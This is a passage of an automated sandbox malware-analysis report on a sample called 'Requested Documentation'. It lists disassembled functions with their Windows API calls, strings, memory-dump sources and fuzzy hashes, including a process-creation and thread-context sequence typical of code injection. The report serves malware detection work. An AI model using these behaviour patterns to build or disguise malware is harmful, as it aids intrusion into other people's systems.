                                                                              • Opcode Fuzzy Hash: cc4bc8c193af456e6db1a38d2a9e24b234382e7eb8fa9d1cd0d5b3e07a75e274
                                                                              • Instruction Fuzzy Hash: 6D114571610208BFDB20DFA9DC81AAEBBBCEF04B40F008469E805E7310E2719E419BA0
                                                                              Function 013012A0 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CreateProcessW.KERNELBASE(?,00000000), ref: 01301ACD
                                                                              • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01301AF1
                                                                              • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01301B13
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1739276238.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_1300000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                              • String ID:
                                                                              • API String ID: 2438371351-0
                                                                              • Opcode ID: a5f8eca76df1c4d60a387bf050efe929c827b8bdc82418feca4108ede207e1c1
                                                                              • Instruction ID: 55125a40c2436ca36269b5873b49211cf2ebfd5c9f40fdbce4a2da0ddc7d1fb6
                                                                              • Opcode Fuzzy Hash: a5f8eca76df1c4d60a387bf050efe929c827b8bdc82418feca4108ede207e1c1
                                                                              • Instruction Fuzzy Hash: A5621B30A14258DBEB25CFA4C850BDEB376EF58304F1091A9D20DEB2D4E7759E81CB59
                                                                              Function 009E955B Relevance: 6.2, APIs: 4, Instructions: 155COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00984EE5: _fseek.LIBCMT ref: 00984EFD
                                                                                • Part of subcall function 009E9734: _wcscmp.LIBCMT ref: 009E9824
                                                                                • Part of subcall function 009E9734: _wcscmp.LIBCMT ref: 009E9837
                                                                              • _free.LIBCMT ref: 009E96A2
                                                                              • _free.LIBCMT ref: 009E96A9
                                                                              • _free.LIBCMT ref: 009E9714
                                                                                • Part of subcall function 009A2D55: RtlFreeHeap.NTDLL(00000000,00000000,?,009A9A24), ref: 009A2D69
                                                                                • Part of subcall function 009A2D55: GetLastError.KERNEL32(00000000,?,009A9A24), ref: 009A2D7B
                                                                              • _free.LIBCMT ref: 009E971C
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                              • String ID:
                                                                              • API String ID: 1552873950-0
                                                                              • Opcode ID: e6309f62c52c5f3975a2c5ad0b5210de68619ff9c4455ff3d11a5af61bc3d5c8
                                                                              • Instruction ID: d198c7f6d40704a95c4bdc52b11a70cd6a2a3195aede0cfea8f7679ded30d905
                                                                              • Opcode Fuzzy Hash: e6309f62c52c5f3975a2c5ad0b5210de68619ff9c4455ff3d11a5af61bc3d5c8
                                                                              • Instruction Fuzzy Hash: 90513DB1904259ABDF259F65CC81B9EBBB9EF88300F10449EB609A3351DB715E80CF58
                                                                              Function 009A470A Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                              • String ID:
                                                                              • API String ID: 2782032738-0
                                                                              • Opcode ID: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                                              • Instruction ID: 564a8c1fa5f1b38cb3b79764eae786509aa8162c9c80a8a47023f1c055c6c061
                                                                              • Opcode Fuzzy Hash: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                                              • Instruction Fuzzy Hash: B241D475A007869BDB18CE69D8809AE77A9EFC3360B24853DE815C7680EBB4DD418BC0
                                                                              Function 00987285 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 009BEA39
                                                                              • GetOpenFileNameW.COMDLG32(?), ref: 009BEA83
                                                                                • Part of subcall function 00984750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00984743,?,?,009837AE,?), ref: 00984770
                                                                                • Part of subcall function 009A0791: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 009A07B0
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Name$Path$FileFullLongOpen_memset
                                                                              • String ID: X
                                                                              • API String ID: 3777226403-3081909835
                                                                              • Opcode ID: 17b4f2da3c0747dfef9d0d47560764472b798870472a2aa858c5ebe3466552f9
                                                                              • Instruction ID: 7b4e4cb2b5b09576de98fba4514cec4ef338fe8301571009feb4ce49e9b3e5e1
                                                                              • Opcode Fuzzy Hash: 17b4f2da3c0747dfef9d0d47560764472b798870472a2aa858c5ebe3466552f9
                                                                              • Instruction Fuzzy Hash: 69219671A002489BDB51EFD4D845BEEBBFDAF89714F104059F408AB341DBB859498F91
                                                                              Function 009E8D91 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: __fread_nolock_memmove
                                                                              • String ID: EA06
                                                                              • API String ID: 1988441806-3962188686
                                                                              • Opcode ID: 9c8ef4ed826562a79839724aef8b5e6effccaf90ebce8c1522e5f983739d43a6
                                                                              • Instruction ID: 993d912281950b144420530071e60415ddaa10719fce6aeb575dd6802512c3d3
                                                                              • Opcode Fuzzy Hash: 9c8ef4ed826562a79839724aef8b5e6effccaf90ebce8c1522e5f983739d43a6
                                                                              • Instruction Fuzzy Hash: 2E01F971D042587EDB18CAA8CC16FEE7BFCDB11301F00459AF556D21C1E879A60487A0
                                                                              Function 009E98E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetTempPathW.KERNEL32(00000104,?), ref: 009E98F8
                                                                              • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 009E990F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Temp$FileNamePath
                                                                              • String ID: aut
                                                                              • API String ID: 3285503233-3010740371
                                                                              • Opcode ID: fd2d24b9b44063c88243738493a3042dbfb0b7e775d50b5922789517ff103ed9
                                                                              • Instruction ID: 8b37d90921475dd3b5190a14b8c0f7e368cd93d3a6caf43443f6f34d365c64c8
                                                                              • Opcode Fuzzy Hash: fd2d24b9b44063c88243738493a3042dbfb0b7e775d50b5922789517ff103ed9
                                                                              • Instruction Fuzzy Hash: A8D05B7554030D7FDB60DBD0DC0DFD6773CE704700F0006B1BA5491091D97055568B91
                                                                              Function 009FCADD Relevance: 4.9, APIs: 3, Instructions: 392COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 95251a783e24e1dc923a972e5166cdddc489d73e598a0315b77301db69ab47ff
                                                                              • Instruction ID: 81e3caa72b6ab3c5d660de588c6684caedadd04f51610bf6370ae9c65f462d28
                                                                              • Opcode Fuzzy Hash: 95251a783e24e1dc923a972e5166cdddc489d73e598a0315b77301db69ab47ff
                                                                              • Instruction Fuzzy Hash: 28F126B06083099FC714DF28C580A6ABBE5FF89314F54892EF9999B391D731E945CF82
                                                                              Function 0098F76F Relevance: 4.7, APIs: 3, Instructions: 168comCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 009A0162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 009A0193
                                                                                • Part of subcall function 009A0162: MapVirtualKeyW.USER32(00000010,00000000), ref: 009A019B
                                                                                • Part of subcall function 009A0162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 009A01A6
                                                                                • Part of subcall function 009A0162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 009A01B1
                                                                                • Part of subcall function 009A0162: MapVirtualKeyW.USER32(00000011,00000000), ref: 009A01B9
                                                                                • Part of subcall function 009A0162: MapVirtualKeyW.USER32(00000012,00000000), ref: 009A01C1
                                                                                • Part of subcall function 009960F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,0098F930), ref: 00996154
                                                                              • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0098F9CD
                                                                              • OleInitialize.OLE32(00000000), ref: 0098FA4A
                                                                              • CloseHandle.KERNEL32(00000000), ref: 009C45C8
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                              • String ID:
                                                                              • API String ID: 1986988660-0
                                                                              • Opcode ID: 0fe6846ae284ea9fb1d231be5b7860c177f8b5cf1f46f54107d76b970a61d1ff
                                                                              • Instruction ID: c3bd0eb12a23e1d07213fc840efe57a30b4f26311a6345604b3fa6f1282cc04e
                                                                              • Opcode Fuzzy Hash: 0fe6846ae284ea9fb1d231be5b7860c177f8b5cf1f46f54107d76b970a61d1ff
                                                                              • Instruction Fuzzy Hash: 6B81AABCD01A40CFC384EFB9A854659BBE6EBCA316764852A9019CF363E7725486CF11
                                                                              Function 0098434A Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 00984370
                                                                              • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00984415
                                                                              • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00984432
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: IconNotifyShell_$_memset
                                                                              • String ID:
                                                                              • API String ID: 1505330794-0
                                                                              • Opcode ID: 7cd9a0c6ece75ab5ea62e3451a31f8837d528fa1d4c1ddbe2ccf46fc0bd2b6a2
                                                                              • Instruction ID: a204ee70c9f9989e27e23180e5f54396a6c555fdf77bf0e351502ce521ed0161
                                                                              • Opcode Fuzzy Hash: 7cd9a0c6ece75ab5ea62e3451a31f8837d528fa1d4c1ddbe2ccf46fc0bd2b6a2
                                                                              • Instruction Fuzzy Hash: EF318174904702CFD721EF74D88469BBBF8FF99308F00092EE59A82351E7B1A945CB52
                                                                              Function 009A571C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • __FF_MSGBANNER.LIBCMT ref: 009A5733
                                                                                • Part of subcall function 009AA16B: __NMSG_WRITE.LIBCMT ref: 009AA192
                                                                                • Part of subcall function 009AA16B: __NMSG_WRITE.LIBCMT ref: 009AA19C
                                                                              • __NMSG_WRITE.LIBCMT ref: 009A573A
                                                                                • Part of subcall function 009AA1C8: GetModuleFileNameW.KERNEL32(00000000,00A433BA,00000104,?,00000001,00000000), ref: 009AA25A
                                                                                • Part of subcall function 009AA1C8: ___crtMessageBoxW.LIBCMT ref: 009AA308
                                                                                • Part of subcall function 009A309F: ___crtCorExitProcess.LIBCMT ref: 009A30A5
                                                                                • Part of subcall function 009A309F: ExitProcess.KERNEL32 ref: 009A30AE
                                                                                • Part of subcall function 009A8B28: __getptd_noexit.LIBCMT ref: 009A8B28
                                                                              • RtlAllocateHeap.NTDLL(01340000,00000000,00000001,00000000,?,?,?,009A0DD3,?), ref: 009A575F
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                              • String ID:
                                                                              • API String ID: 1372826849-0
                                                                              • Opcode ID: 5c5dd8ea0470204854024d017fa37ede5dc8ce0232f7e900bba06be7b6f628bb
                                                                              • Instruction ID: 5af26579eeea164758a9ee70f2970881aefb028733854e21691ad8ce143abb8c
                                                                              • Opcode Fuzzy Hash: 5c5dd8ea0470204854024d017fa37ede5dc8ce0232f7e900bba06be7b6f628bb
                                                                              • Instruction Fuzzy Hash: 9101F57A304B01EFDA516774EC82B2E735C8BC3361F620525F505BA182EFB58C4186E0
                                                                              Function 009E98A2 Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,009E9548,?,?,?,?,?,00000004), ref: 009E98BB
                                                                              • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,009E9548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 009E98D1
                                                                              • CloseHandle.KERNEL32(00000000,?,009E9548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 009E98D8
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: File$CloseCreateHandleTime
                                                                              • String ID:
                                                                              • API String ID: 3397143404-0
                                                                              • Opcode ID: ac2179e4d0e0ea5aa3029f5e61dec4d0829dd5286ba4f22481e23e452c9f0edc
                                                                              • Instruction ID: fd1cb9c3471656cb322567b3a84deea76f9ecbf4c75e88458caf2d75b4bdf81d
                                                                              • Opcode Fuzzy Hash: ac2179e4d0e0ea5aa3029f5e61dec4d0829dd5286ba4f22481e23e452c9f0edc
                                                                              • Instruction Fuzzy Hash: 0AE0863214121CBFD7315B94EC09FCA7B19AB06B70F104220FB24794E087B1192397D8
                                                                              Function 009E8D0D Relevance: 4.5, APIs: 3, Instructions: 22COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _free.LIBCMT ref: 009E8D1B
                                                                                • Part of subcall function 009A2D55: RtlFreeHeap.NTDLL(00000000,00000000,?,009A9A24), ref: 009A2D69
                                                                                • Part of subcall function 009A2D55: GetLastError.KERNEL32(00000000,?,009A9A24), ref: 009A2D7B
                                                                              • _free.LIBCMT ref: 009E8D2C
                                                                              • _free.LIBCMT ref: 009E8D3E
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                              • String ID:
                                                                              • API String ID: 776569668-0
                                                                              • Opcode ID: ca4aeb20cc18b172a2b301ecc852c49215d3c1f999f8f195bb222a4262111412
                                                                              • Instruction ID: 52387bd832643331ff33c563e9869301e8a5c1988d0ae2f24362c13e4a0e6009
                                                                              • Opcode Fuzzy Hash: ca4aeb20cc18b172a2b301ecc852c49215d3c1f999f8f195bb222a4262111412
                                                                              • Instruction Fuzzy Hash: 7EE017A160164146CB26A6BEAD40B9323EC4F9D352B140D1EB40DD71C7CE64FC8281A8
                                                                              Function 0098A9C3 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: CALL
                                                                              • API String ID: 0-4196123274
                                                                              • Opcode ID: a95030bb6fcc2e6a2b580c1079786b1fffb0bebb55f3305fae34290191780dd8
                                                                              • Instruction ID: 801193b4f17c933c63d4244416caf6fca2fe553fb595f0b7b04ec77de16d969d
                                                                              • Opcode Fuzzy Hash: a95030bb6fcc2e6a2b580c1079786b1fffb0bebb55f3305fae34290191780dd8
                                                                              • Instruction Fuzzy Hash: 87225974508301DFDB24EF14C494B6ABBE5BF85314F18896EE89A8B362D735EC45CB82
                                                                              Function 00984C70 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 141COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: _memmove
                                                                              • String ID: EA06
                                                                              • API String ID: 4104443479-3962188686
                                                                              • Opcode ID: 86be7b36f5f2bfd0c85778efdfc554b48f4bd6339d121339dabefdde5d06ad1f
                                                                              • Instruction ID: 65158c892d53d4daa0c2be65a13e17e5a368b0152c9934031515a7ed844bba1b
                                                                              • Opcode Fuzzy Hash: 86be7b36f5f2bfd0c85778efdfc554b48f4bd6339d121339dabefdde5d06ad1f
                                                                              • Instruction Fuzzy Hash: 8B415F31A0425A5BDF21BB64CC517BE7FA59F85300F684475EC86DB3C6D624BD4483A1
                                                                              Function 009847D0 Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • IsThemeActive.UXTHEME ref: 00984834
                                                                                • Part of subcall function 009A336C: __lock.LIBCMT ref: 009A3372
                                                                                • Part of subcall function 009A336C: DecodePointer.KERNEL32(00000001,?,00984849,009D7C74), ref: 009A337E
                                                                                • Part of subcall function 009A336C: EncodePointer.KERNEL32(?,?,00984849,009D7C74), ref: 009A3389
                                                                                • Part of subcall function 009848FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00984915
                                                                                • Part of subcall function 009848FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0098492A
                                                                                • Part of subcall function 00983B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00983B68
                                                                                • Part of subcall function 00983B3A: IsDebuggerPresent.KERNEL32 ref: 00983B7A
                                                                                • Part of subcall function 00983B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,00A452F8,00A452E0,?,?), ref: 00983BEB
                                                                                • Part of subcall function 00983B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 00983C6F
                                                                              • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00984874
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                                              • String ID:
                                                                              • API String ID: 1438897964-0
                                                                              • Opcode ID: 301cbca3b7cc6d6c0fbc51a5c2d6b2b5bfed072380a06233fe066c837b0b7cd6
                                                                              • Instruction ID: 1744cdf5d97280bc3a09b7af2bd156c5c74aa62ccd69911706cb06ab58577fa0
                                                                              • Opcode Fuzzy Hash: 301cbca3b7cc6d6c0fbc51a5c2d6b2b5bfed072380a06233fe066c837b0b7cd6
                                                                              • Instruction Fuzzy Hash: 75116F799083059FCB00EFB8D80595ABBE8EFC6750F10851BF04193261DBB19546CB92
                                                                              Function 00985C99 Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
